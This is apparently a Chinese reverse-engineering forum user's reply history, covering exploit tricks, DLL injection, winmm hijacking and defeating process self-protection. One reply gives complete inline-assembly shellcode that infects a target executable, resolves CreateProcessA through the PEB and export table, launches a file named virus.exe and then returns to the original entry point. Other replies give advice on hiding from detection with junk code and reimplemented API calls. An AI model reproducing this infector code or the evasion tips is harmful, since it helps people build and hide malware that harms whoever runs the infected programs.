|
[讨论]谁知道这个原理?接收RAR文件即中,无需运行.
0day 当年,拿到Ani的exp,修改了几下,过了微软MS-07017补丁,后来又被修复了,在后来发现某人利用Ani制作成RAR自运行的了,完全无语。 |
|
[求助]关于使用Windows钩子将dll注入进程结束相关进程的实现
如果想HOOK 指定的程序的有两种简单通用的办法 1:SMC kernel32.dll 改头到你的区段,然后拖你的DLL启动。 2:给winmm穿马甲,实现部分放在winmm里面,也可以全局HOOK。 |
|
[求助]远程dll线程资源释放问题
建议你这么写。 test := tstringlist.create; try //不管这里代码是否异常,都会强制释放已经分配的对象资源 finally test.free; end; 可以理解成一个析构函数,用来强制释放资源的! |
|
[求助]DLL外挂可以实现修改装备属性功能吗
又见winmm劫持。 |
|
[代发]小女子寻求帮助
小女子醉翁之意不在酒~~~ |
|
[原创]三线程防杀2测试(更新)原理已发布
客气,指点谈不上,只是想让你写的更佳完美些。 |
|
|
|
[原创]三线程防杀2测试(更新)原理已发布
逆了下你6个子函数,发现基本没做函数功能自身保护。 简单给你DLL 和 EXE 加了一段shellcode运行我的dll SEH HOOK CreateThread,你的线程守护又失效了。 给你点建议 在dllMain这个地方,不要马上去创建功能函数线程的,多加些检测。 还有CopyFileA,OpenProcess ,SetFileAttributesA 最好自己实现,不要直接去调API。 |
|
[原创]三线程防杀2测试(更新)原理已发布
我都看到源码了。 |
|
[推荐]关于三线程防杀的一些思想和VC代码
把你这个Main.exe一感染,Hook CreateThread 主线程的放过的,其他的全部KO |
|
|
|
[讨论] 有没有另类的点的注入DLL方法
还有一种直接shellcode感染目标程序进行注入. asm pushad {根据PEB结构获得kernel32.dll基址} mov eax,fs:$30 mov eax,[eax+$0c] mov esi,[eax+$1c] lodsd dw $9090 nop //分块标志 {=================================} mov eax,[eax+$08] //eax=Kernel32基址 {根据引出表获得CreateProcessA函数的地址} mov ebp,eax mov eax,[eax+$3C] //eax=eax._lfanew add eax,ebp mov eax,[eax+$78] //eax=eax.OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_EXPORT] add eax,ebp dw $9090 nop {=================================} mov ebx,[eax+$18] //ebx=eax.NumberOfNames dec ebx mov ecx,[eax+$20] //ecx=eax.AddressOfNames add ecx,ebp //ecx指向函数名数组 xor edx,edx dec edx dw $9090 nop {=================================} search: //搜索需要的函数名 inc edx mov esi,[ecx+edx*4] add esi,ebp //esi指向当前搜索到的函数名 cmp dword ptr [esi], $61657243 //'Crea' jne search cmp dword ptr [esi+4],$72506574 //'tePr' jne search cmp dword ptr [esi+8],$7365636f //'oces' jne search cmp word ptr [esi+12],$4173 //'sA' jne search dw $9090 nop mov ebx,[eax+$24] //ebx=eax.AddressOfNameOrdinal add ebx,ebp //ebx指向输出序号数组 mov edx,[ebx+2*edx] shl edx,16 shr edx,16 mov ebx,[eax+$1c] //ebx=eax.AddressOfFunctions add ebx,ebp //ebx指向函数地址数组 dw $9090 nop {=================================} mov eax,[ebx+edx*4] add eax,ebp mov esi,eax {构建字符串} mov ebp,esp sub esp,$64 //分配100个字节作为局部变量 mov [ebp-$A],$75726976 mov [ebp-$6],$78652e73 dw $9090 nop {=================================} mov word ptr [ebp-$2],$0065 //构造字符串 lea ebx,[ebp-$64] mov ecx,$44 //填充StartupInfo参数 mov edi,ebx xor eax,eax rep stosb //清零 dw $9090 nop mov [ebx+$2C],$1 //ebx.dwFlags=STARTF_USESHOWWINDOW lea ecx,[ebp-$20] lea eax,[ebp-$A] //eax指向文件名字符串 {调用CreateProcessA} 这里自己可以实现LoadLibraryA push ecx //TProcessInformation push ebx //StartupInfo push 0 push 0 push 0 push 1 push 0 push 0 push eax //文件名 push 0 call esi //调用} dw $9090 nop {=================================} add esp,$64 popad jmp eax //跳向原始OEP dd $90909090 nop nop nop nop nop end; 这里new一块内存,将$0065 分成2字节随机存放。 将LoadLibraryA放到随机分配的内存中去,然后jmp 过去,入口上弄一段随机花. |
|
将DELPHI代码翻译成C++代码下
纯ASM的代码 |
|
|
操作理由
RANk
{{ user_info.golds == '' ? 0 : user_info.golds }}
雪币
{{ experience }}
课程经验
{{ score }}
学习收益
{{study_duration_fmt}}
学习时长
基本信息
荣誉称号:
{{ honorary_title }}
能力排名:
No.{{ rank_num }}
等 级:
LV{{ rank_lv-100 }}
活跃值:
在线值:
浏览人数:{{ visits }}
最近活跃:{{ last_active_time }}
注册时间:{{ user_info.create_date_jsonfmt }}
勋章
兑换勋章
证书
证书查询 >
能力值